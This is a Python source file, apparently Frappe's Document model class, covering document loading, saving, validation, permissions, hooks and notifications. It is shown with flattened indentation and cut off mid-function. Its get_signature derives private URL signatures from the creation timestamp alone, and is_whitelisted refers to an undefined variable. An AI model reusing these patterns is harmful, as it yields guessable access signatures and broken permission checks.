# MIT License. See license.txt
from __future__ import unicode_literals, print_function
import frappe
import time
from frappe import _, msgprint, is_whitelisted
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, table_fields
from frappe.model.workflow import validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
# once_only validation
# methods
def get_doc(*args, **kwargs):
"""returns a frappe.model.Document object.
:param arg1: Document dict or DocType name.
:param arg2: [optional] document name.
:param for_update: [optional] select document for update.
There are multiple ways to call `get_doc`
# will fetch the latest user object (with child table) from the database
user = get_doc("User", "test@example.com")
# create a new object
user = get_doc({
"doctype":"User"
"email_id": "test@example.com",
"roles: [
{"role": "System Manager"}
]
})
# create new object with keyword arguments
user = get_doc(doctype='User', email_id='test@example.com')
# select a document for update
user = get_doc("User", "test@example.com", for_update=True)
"""
if args:
if isinstance(args[0], BaseDocument):
# already a document
return args[0]
elif isinstance(args[0], string_types):
doctype = args[0]
elif isinstance(args[0], dict):
# passed a dict
kwargs = args[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(args) < 2 and kwargs:
if 'doctype' in kwargs:
doctype = kwargs['doctype']
else:
raise ValueError('"doctype" is a required key')
controller = get_controller(doctype)
if controller:
return controller(*args, **kwargs)
raise ImportError(doctype)
class Document(BaseDocument):
"""All controllers inherit from `Document`."""
def __init__(self, *args, **kwargs):
"""Constructor.
:param arg1: DocType name as string or document **dict**
:param arg2: Document name, if `arg1` is DocType name.
If DocType name and document name are passed, the object will load
all values (including child documents) from the database.
"""
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if args and args[0] and isinstance(args[0], string_types):
# first arugment is doctype
if len(args)==1:
# single
self.doctype = self.name = args[0]
else:
self.doctype = args[0]
if isinstance(args[1], dict):
# filter
self.name = frappe.db.get_value(args[0], args[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(args[0]), args[1]),
frappe.DoesNotExistError)
else:
self.name = args[1]
if 'for_update' in kwargs:
self.flags.for_update = kwargs.get('for_update')
self.load_from_db()
return
if args and args[0] and isinstance(args[0], dict):
# first argument is a dict
kwargs = args[0]
if kwargs:
# init base document
super(Document, self).__init__(kwargs)
self.init_valid_columns()
else:
# incorrect arguments. let's not proceed.
raise ValueError('Illegal arguments')
@staticmethod
def whitelist(fn):
"""Decorator: Whitelist method to be called remotely via REST API."""
frappe.whitelist()(fn)
return fn
def reload(self):
"""Reload document from database"""
self.load_from_db()
def load_from_db(self):
"""Load document and children from database and create properties
from fields"""
if not getattr(self, "_metaclass", False) and self.meta.issingle:
single_doc = frappe.db.get_singles_dict(self.doctype)
if not single_doc:
single_doc = frappe.new_doc(self.doctype).as_dict()
single_doc["name"] = self.doctype
del single_doc["__islocal"]
super(Document, self).__init__(single_doc)
self.init_valid_columns()
self._fix_numeric_types()
else:
d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not d:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(Document, self).__init__(d)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
table_fields = DOCTYPE_TABLE_FIELDS
else:
table_fields = self.meta.get_table_fields()
for df in table_fields:
children = frappe.db.get_values(df.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
"*", as_dict=True, order_by="idx asc")
if children:
self.set(df.fieldname, children)
else:
self.set(df.fieldname, [])
# sometimes __setup__ can depend on child values, hence calling again at the end
if hasattr(self, "__setup__"):
self.__setup__()
def get_latest(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def check_permission(self, permtype='read', permlevel=None):
"""Raise `frappe.PermissionError` if not permitted"""
if not self.has_permission(permtype):
self.raise_no_permission_to(permlevel or permtype)
def has_permission(self, permtype="read", verbose=False):
"""Call `frappe.has_permission` if `self.flags.ignore_permissions`
is not set.
:param permtype: one of `read`, `write`, `submit`, `cancel`, `delete`"""
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, permtype, self, verbose=verbose)
def raise_no_permission_to(self, perm_type):
"""Raise `frappe.PermissionError`."""
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def insert(self, ignore_permissions=None, ignore_links=None, ignore_if_duplicate=False,
ignore_mandatory=None, set_name=None, set_child_names=True):
"""Insert the document in the database (as a new document).
This will check for user permissions and execute `before_insert`,
`validate`, `on_update`, `after_insert` methods if they are written.
:param ignore_permissions: Do not check permissions if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
if ignore_links!=None:
self.flags.ignore_links = ignore_links
if ignore_mandatory!=None:
self.flags.ignore_mandatory = ignore_mandatory
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(set_name=set_name, set_child_names=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
# run validate, on update etc.
# parent
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not ignore_if_duplicate:
raise e
# children
for d in self.get_all_children():
d.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
# flag to prevent creation of event update log for create and update both
# during document creation
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
# delete __islocal
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def save(self, *args, **kwargs):
"""Wrapper for _save"""
return self._save(*args, **kwargs)
def _save(self, ignore_permissions=None, ignore_version=None):
"""Save the current document in the database in the **DocType**'s table or
`tabSingles` (for single types).
This will check for user permissions and execute
`validate` before updating, `on_update` after updating triggers.
:param ignore_permissions: Do not check permissions if True.
:param ignore_version: Do not save version if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
self.flags.ignore_version = frappe.flags.in_test if ignore_version is None else ignore_version
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
# parent
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def copy_attachments_from_amended_from(self):
"""Copy attachments from `amended_from`"""
from frappe.desk.form.load import get_attachments
#loop through attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
#save attachments to new doc
_file = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
_file.save()
def update_children(self):
"""update child tables"""
for df in self.meta.get_table_fields():
self.update_child_table(df.fieldname, df)
def update_child_table(self, fieldname, df=None):
"""sync child table for given fieldname"""
rows = []
if not df:
df = self.meta.get_field(fieldname)
for d in self.get(df.fieldname):
d.db_update()
rows.append(d.name)
if df.options in (self.flags.ignore_children_type or []):
# do not delete rows for this because of flags
# hack for docperm :(
return
if rows:
# select rows that do not match the ones in the document
deleted_rows = frappe.db.sql("""select name from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s
and name not in ({1})""".format(df.options, ','.join(['%s'] * len(rows))),
[self.name, self.doctype, fieldname] + rows)
if len(deleted_rows) > 0:
# delete rows that do not match the ones in the document
frappe.db.sql("""delete from `tab{0}` where name in ({1})""".format(df.options,
','.join(['%s'] * len(deleted_rows))), tuple(row[0] for row in deleted_rows))
else:
# no rows found, delete all rows
frappe.db.sql("""delete from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s""".format(df.options),
(self.name, self.doctype, fieldname))
def get_doc_before_save(self):
return getattr(self, '_doc_before_save', None)
def has_value_changed(self, fieldname):
'''Returns true if value is changed before and after saving'''
previous = self.get_doc_before_save()
return previous.get(fieldname)!=self.get(fieldname) if previous else True
def set_new_name(self, force=False, set_name=None, set_child_names=True):
"""Calls `frappe.naming.set_new_name` for parent and child docs."""
if self.flags.name_set and not force:
return
# If autoname has set as Prompt (name)
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if set_name:
self.name = set_name
else:
set_new_name(self)
if set_child_names:
# set name for children
for d in self.get_all_children():
set_new_name(d)
self.flags.name_set = True
def get_title(self):
"""Get the document title based on title_field or `title` or `name`"""
return self.get(self.meta.get_title_field())
def set_title_field(self):
"""Set title field based on template"""
def get_values():
values = self.as_dict()
# format values
for key, value in iteritems(values):
if value==None:
values[key] = ""
return values
if self.meta.get("title_field")=="title":
df = self.meta.get_field(self.meta.title_field)
if df.options:
self.set(df.fieldname, df.options.format(**get_values()))
elif self.is_new() and not self.get(df.fieldname) and df.default:
# set default title for new transactions (if default)
self.set(df.fieldname, df.default.format(**get_values()))
def update_single(self, d):
"""Updates values for Single type Document in `tabSingles`."""
frappe.db.sql("""delete from `tabSingles` where doctype=%s""", self.doctype)
for field, value in iteritems(d):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (doctype, field, value)
values (%s, %s, %s)""", (self.doctype, field, value))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def set_user_and_timestamp(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for d in self.get_all_children():
d.modified = self.modified
d.modified_by = self.modified_by
if not d.owner:
d.owner = self.owner
if not d.creation:
d.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def set_docstatus(self):
if self.docstatus==None:
self.docstatus=0
for d in self.get_all_children():
d.docstatus = self.docstatus
def _validate(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
children = self.get_all_children()
for d in children:
d._validate_data_fields()
d._validate_selects()
d._validate_non_negative()
d._validate_length()
d._extract_images_from_text_editor()
d._sanitize_content()
d._save_passwords()
if self.is_new():
# don't set fields like _assign, _comments for new doc
for fieldname in optional_fields:
self.set(fieldname, None)
else:
self.validate_set_only_once()
def _validate_non_negative(self):
def get_msg(df):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(df.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(df.parent), frappe.bold(_(df.label)))
for df in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(df.fieldname)) < 0:
msg = get_msg(df)
frappe.throw(msg, frappe.NonNegativeError, title=_("Negative Value"))
def validate_workflow(self):
"""Validate if the workflow transition is valid"""
if frappe.flags.in_install == 'frappe': return
workflow = self.meta.get_workflow()
if workflow:
validate_workflow(self)
if not self._action == 'save':
set_workflow_state_on_action(self, workflow, self._action)
def validate_set_only_once(self):
"""Validate that fields are not changed if not in insert"""
set_only_once_fields = self.meta.get_set_only_once_fields()
if set_only_once_fields and self._doc_before_save:
# document exists before saving
for field in set_only_once_fields:
fail = False
value = self.get(field.fieldname)
original_value = self._doc_before_save.get(field.fieldname)
if field.fieldtype in table_fields:
fail = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
fail = str(value) != str(original_value)
else:
fail = value != original_value
if fail:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def is_child_table_same(self, fieldname):
"""Validate child table is same as original table before saving"""
value = self.get(fieldname)
original_value = self._doc_before_save.get(fieldname)
same = True
if len(original_value) != len(value):
same = False
else:
# check all child entries
for i, d in enumerate(original_value):
new_child = value[i].as_dict(convert_dates_to_str = True)
original_child = d.as_dict(convert_dates_to_str = True)
# all fields must be same other than modified and modified_by
for key in ('modified', 'modified_by', 'creation'):
del new_child[key]
del original_child[key]
if original_child != new_child:
same = False
break
return same
def apply_fieldlevel_read_permissions(self):
"""Remove values the user is not allowed to read (called when loading in desk)"""
if frappe.session.user == "Administrator":
return
has_higher_permlevel = False
all_fields = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
all_fields += frappe.get_meta(table_field.options).fields or []
for df in all_fields:
if df.permlevel > 0:
has_higher_permlevel = True
break
if not has_higher_permlevel:
return
has_access_to = self.get_permlevel_access('read')
for df in self.meta.fields:
if df.permlevel and not df.permlevel in has_access_to:
self.set(df.fieldname, None)
for table_field in self.meta.get_table_fields():
for df in frappe.get_meta(table_field.options).fields or []:
if df.permlevel and not df.permlevel in has_access_to:
for child in self.get(table_field.fieldname) or []:
child.set(df.fieldname, None)
def validate_higher_perm_levels(self):
"""If the user does not have permissions at permlevel > 0, then reset the values to original / default"""
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
has_access_to = self.get_permlevel_access()
high_permlevel_fields = self.meta.get_high_permlevel_fields()
if high_permlevel_fields:
self.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
# If new record then don't reset the values for child table
if self.is_new(): return
# check for child tables
for df in self.meta.get_table_fields():
high_permlevel_fields = frappe.get_meta(df.options).get_high_permlevel_fields()
if high_permlevel_fields:
for d in self.get(df.fieldname):
d.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
def get_permlevel_access(self, permission_type='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[permission_type] = []
roles = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in roles and perm.get(permission_type):
if perm.permlevel not in self._has_access_to[permission_type]:
self._has_access_to[permission_type].append(perm.permlevel)
return self._has_access_to[permission_type]
def has_permlevel_access_to(self, fieldname, df=None, permission_type='read'):
if not df:
df = self.meta.get_field(fieldname)
return df.permlevel in self.get_permlevel_access(permission_type)
def get_permissions(self):
if self.meta.istable:
# use parent permissions
permissions = frappe.get_meta(self.parenttype).permissions
else:
permissions = self.meta.permissions
return permissions
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options, as_dict=True)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
def check_if_latest(self):
"""Checks if `modified` timestamp provided by document being updated is same as the
`modified` timestamp in the database. If there is a different, the document has been
updated in the database after the current copy was read. Will throw an error if
timestamps don't match.
Will also validate document transitions (Save > Submit > Cancel) calling
`self.check_docstatus_transition`."""
conflict = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
modified = frappe.db.sql("""select value from tabSingles
where doctype=%s and field='modified' for update""", self.doctype)
modified = modified and modified[0][0]
if modified and modified != cstr(self._original_modified):
conflict = True
else:
tmp = frappe.db.sql("""select modified, docstatus from `tab{0}`
where name = %s for update""".format(self.doctype), self.name, as_dict=True)
if not tmp:
frappe.throw(_("Record does not exist"))
else:
tmp = tmp[0]
modified = cstr(tmp.modified)
if modified and modified != cstr(self._original_modified):
conflict = True
self.check_docstatus_transition(tmp.docstatus)
if conflict:
frappe.msgprint(_("Error: Document has been modified after you have opened it") \
+ (" (%s, %s). " % (modified, self.modified)) \
+ _("Please refresh to get the latest document."),
raise_exception=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def check_docstatus_transition(self, docstatus):
"""Ensures valid `docstatus` transition.
Valid transitions are (number in brackets is `docstatus`):
- Save (0) > Save (0)
- Save (0) > Submit (1)
- Submit (1) > Submit (1)
- Submit (1) > Cancel (2)
"""
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))
elif docstatus==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def set_parent_in_children(self):
"""Updates `parent` and `parenttype` property in all children."""
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
def set_name_in_children(self):
# Set name for any new children
for d in self.get_all_children():
if not d.name:
set_new_name(d)
def validate_update_after_submit(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for d in self.get_all_children():
if d.is_new() and self.meta.get_field(d.parentfield).allow_on_submit:
# in case of a new row, don't validate allow on submit, if table is allow on submit
continue
d._validate_update_after_submit()
# TODO check only allowed values are updated
def _validate_mandatory(self):
if self.flags.ignore_mandatory:
return
missing = self._get_missing_mandatory_fields()
for d in self.get_all_children():
missing.extend(d._get_missing_mandatory_fields())
if not missing:
return
for fieldname, msg in missing:
msgprint(msg)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{doctype}, {name}]: {fields}'.format(
fields=", ".join((each[0] for each in missing)),
doctype=self.doctype,
name=self.name))
def _validate_links(self):
if self.flags.ignore_links or self._action == "cancel":
return
invalid_links, cancelled_links = self.get_invalid_links()
for d in self.get_all_children():
result = d.get_invalid_links(is_submittable=self.meta.is_submittable)
invalid_links.extend(result[0])
cancelled_links.extend(result[1])
if invalid_links:
msg = ", ".join((each[2] for each in invalid_links))
frappe.throw(_("Could not find {0}").format(msg),
frappe.LinkValidationError)
if cancelled_links:
msg = ", ".join((each[2] for each in cancelled_links))
frappe.throw(_("Cannot link cancelled document: {0}").format(msg),
frappe.CancelledLinkError)
def get_all_children(self, parenttype=None):
"""Returns all children documents from **Table** type field in a list."""
ret = []
for df in self.meta.get("fields", {"fieldtype": ['in', table_fields]}):
if parenttype:
if df.options==parenttype:
return self.get(df.fieldname)
value = self.get(df.fieldname)
if isinstance(value, list):
ret.extend(value)
return ret
def run_method(self, method, *args, **kwargs):
"""run standard triggers, plus those in hooks"""
if "flags" in kwargs:
del kwargs["flags"]
if hasattr(self, method) and hasattr(getattr(self, method), "__call__"):
fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
else:
# hack! to run hooks even if method does not exist
fn = lambda self, *args, **kwargs: None
fn.__name__ = str(method)
out = Document.hook(fn)(self, *args, **kwargs)
self.run_notifications(method)
run_webhooks(self, method)
run_server_script_for_doc_event(self, method)
return out
def run_trigger(self, method, *args, **kwargs):
return self.run_method(method, *args, **kwargs)
def run_notifications(self, method):
"""Run notifications for this method"""
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
alerts = frappe.cache().hget('notifications', self.doctype)
if alerts==None:
alerts = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, alerts)
self.flags.notifications = alerts
if not self.flags.notifications:
return
def _evaluate_alert(alert):
if not alert.name in self.flags.notifications_executed:
evaluate_alert(self, alert.name, alert.event)
self.flags.notifications_executed.append(alert.name)
event_map = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
# value change is not applicable in insert
event_map['on_change'] = 'Value Change'
for alert in self.flags.notifications:
event = event_map.get(method, None)
if event and alert.event == event:
_evaluate_alert(alert)
elif alert.event=='Method' and method == alert.method:
_evaluate_alert(alert)
@whitelist.__func__
def _submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self.docstatus = 1
self.save()
@whitelist.__func__
def _cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self.docstatus = 2
self.save()
@whitelist.__func__
def submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self._submit()
@whitelist.__func__
def cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self._cancel()
def delete(self, ignore_permissions=False):
"""Delete document."""
frappe.delete_doc(self.doctype, self.name, ignore_permissions = ignore_permissions, flags=self.flags)
def run_before_save_methods(self):
"""Run standard methods before `INSERT` or `UPDATE`. Standard Methods are:
- `validate`, `before_save` for **Save**.
- `validate`, `before_submit` for **Submit**.
- `before_cancel` for **Cancel**
- `before_update_after_submit` for **Update after Submit**
Will also update title_field if set"""
self.load_doc_before_save()
self.reset_seen()
# before_validate method should be executed before ignoring validations
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def load_doc_before_save(self):
"""Save load document from db before saving"""
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def run_post_save_methods(self):
"""Run standard methods after `INSERT` or `UPDATE`. Standard Methods are:
- `on_update` for **Save**.
- `on_update`, `on_submit` for **Submit**.
- `on_cancel` for **Cancel**
- `update_after_submit` for **Update after Submit**"""
doc_before_save = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def clear_cache(self):
frappe.clear_document_cache(self.doctype, self.name)
def reset_seen(self):
"""Clear _seen property and set current user as seen"""
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), update_modified=False)
def notify_update(self):
"""Publish realtime that the current document is modified"""
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
doctype=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
data = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", data, after_commit=True)
def db_set(self, fieldname, value=None, update_modified=True, notify=False, commit=False):
"""Set a value in the document object, update the timestamp and update the database.
WARNING: This method does not trigger controller validations and should
be used very carefully.
:param fieldname: fieldname of the property to be updated, or a {"field":"value"} dictionary
:param value: value of the property to be updated
:param update_modified: default True. updates the `modified` and `modified_by` properties
:param notify: default False. run doc.notify_updated() to send updates via socketio
:param commit: default False. run frappe.db.commit()
"""
if isinstance(fieldname, dict):
self.update(fieldname)
else:
self.set(fieldname, value)
if update_modified and (self.doctype, self.name) not in frappe.flags.currently_saving:
# don't update modified timestamp if called from post save methods
# like on_update or on_submit
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
# to trigger notification on value change
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, fieldname, value,
self.modified, self.modified_by, update_modified=update_modified)
self.run_method('on_change')
if notify:
self.notify_update()
self.clear_cache()
if commit:
frappe.db.commit()
def db_get(self, fieldname):
"""get database value for this fieldname"""
return frappe.db.get_value(self.doctype, self.name, fieldname)
def check_no_back_links_exist(self):
"""Check if document links to any active document before Cancel."""
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, method="Cancel")
check_if_doc_is_dynamically_linked(self, method="Cancel")
def save_version(self):
"""Save version info"""
# don't track version under following conditions
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
version = frappe.new_doc('Version')
if not self._doc_before_save:
version.for_insert(self)
version.insert(ignore_permissions=True)
elif version.set_diff(self._doc_before_save, self):
version.insert(ignore_permissions=True)
if not frappe.flags.in_migrate:
# follow since you made a change?
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def hook(f):
"""Decorator: Make method `hookable` (i.e. extensible by another app).
Note: If each hooked method returns a value (dict), then all returns are
collated in one dict and returned. Ideally, don't return values in hookable
methods, set properties in the document."""
def add_to_return_value(self, new_return_value):
if isinstance(new_return_value, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(new_return_value)
else:
self._return_value = new_return_value or self.get("_return_value")
def compose(fn, *hooks):
def runner(self, method, *args, **kwargs):
add_to_return_value(self, fn(self, *args, **kwargs))
for f in hooks:
add_to_return_value(self, f(self, method, *args, **kwargs))
return self._return_value
return runner
def composer(self, *args, **kwargs):
hooks = []
method = f.__name__
doc_events = frappe.get_doc_hooks()
for handler in doc_events.get(self.doctype, {}).get(method, []) \
+ doc_events.get("*", {}).get(method, []):
hooks.append(frappe.get_attr(handler))
composed = compose(f, *hooks)
return composed(self, method, *args, **kwargs)
return composer
def is_whitelisted(self, method_name):
method = getattr(self, method_name, None)
if not fn:
raise NotFound("Method {0} not found".format(method_name))
is_whitelisted(getattr(method, '__func__', method))
def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
"""Check that value of fieldname should be 'condition' val2
else throw Exception."""
error_condition_map = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not doc:
doc = self
val1 = doc.get_value(fieldname)
df = doc.meta.get_field(fieldname)
val2 = doc.cast(val2, df)
if not frappe.compare(val1, condition, val2):
label = doc.meta.get_label(fieldname)
condition_str = error_condition_map.get(condition, condition)
if doc.parentfield:
msg = _("Incorrect value in row {0}: {1} must be {2} {3}").format(doc.idx, label, condition_str, val2)
else:
msg = _("Incorrect value: {0} must be {1} {2}").format(label, condition_str, val2)
# raise passed exception or True
msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
"""Raise exception if Table field is empty."""
if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
label = self.meta.get_label(parentfield)
frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
"""Round floats for all `Currency`, `Float`, `Percent` fields for the given doc.
:param doc: Document whose numeric properties are to be rounded.
:param fieldnames: [Optional] List of fields to be rounded."""
if not fieldnames:
fieldnames = (df.fieldname for df in
doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for fieldname in fieldnames:
doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def get_url(self):
"""Returns Desk URL for this document. `/app/Form/{doctype}/{name}`"""
return "/app/Form/{doctype}/{name}".format(doctype=self.doctype, name=self.name)
def add_comment(self, comment_type='Comment', text=None, comment_email=None, link_doctype=None, link_name=None, comment_by=None):
"""Add a comment to this document.
:param comment_type: e.g. `Comment`. See Communication for more info."""
out = frappe.get_doc({
"doctype":"Comment",
'comment_type': comment_type,
"comment_email": comment_email or frappe.session.user,
"comment_by": comment_by,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": text or comment_type,
"link_doctype": link_doctype,
"link_name": link_name
}).insert(ignore_permissions=True)
return out
def add_seen(self, user=None):
"""add the given/current user to list of users who have seen this document (_seen)"""
if not user:
user = frappe.session.user
if self.meta.track_seen:
_seen = self.get('_seen') or []
_seen = frappe.parse_json(_seen)
if user not in _seen:
_seen.append(user)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(_seen), update_modified=False)
frappe.local.flags.commit = True
def add_viewed(self, user=None):
"""add log to communication when a user views a document"""
if not user:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(ignore_permissions=True)
frappe.local.flags.commit = True
def get_signature(self):
"""Returns signature (hash) for private URL."""
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def get_liked_by(self):
liked_by = getattr(self, "_liked_by", None)
if liked_by:
return json.loads(liked_by)
else:
return []
def set_onload(self, key, value):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[key] = value
def get_onload(self, key=None):
if not key:
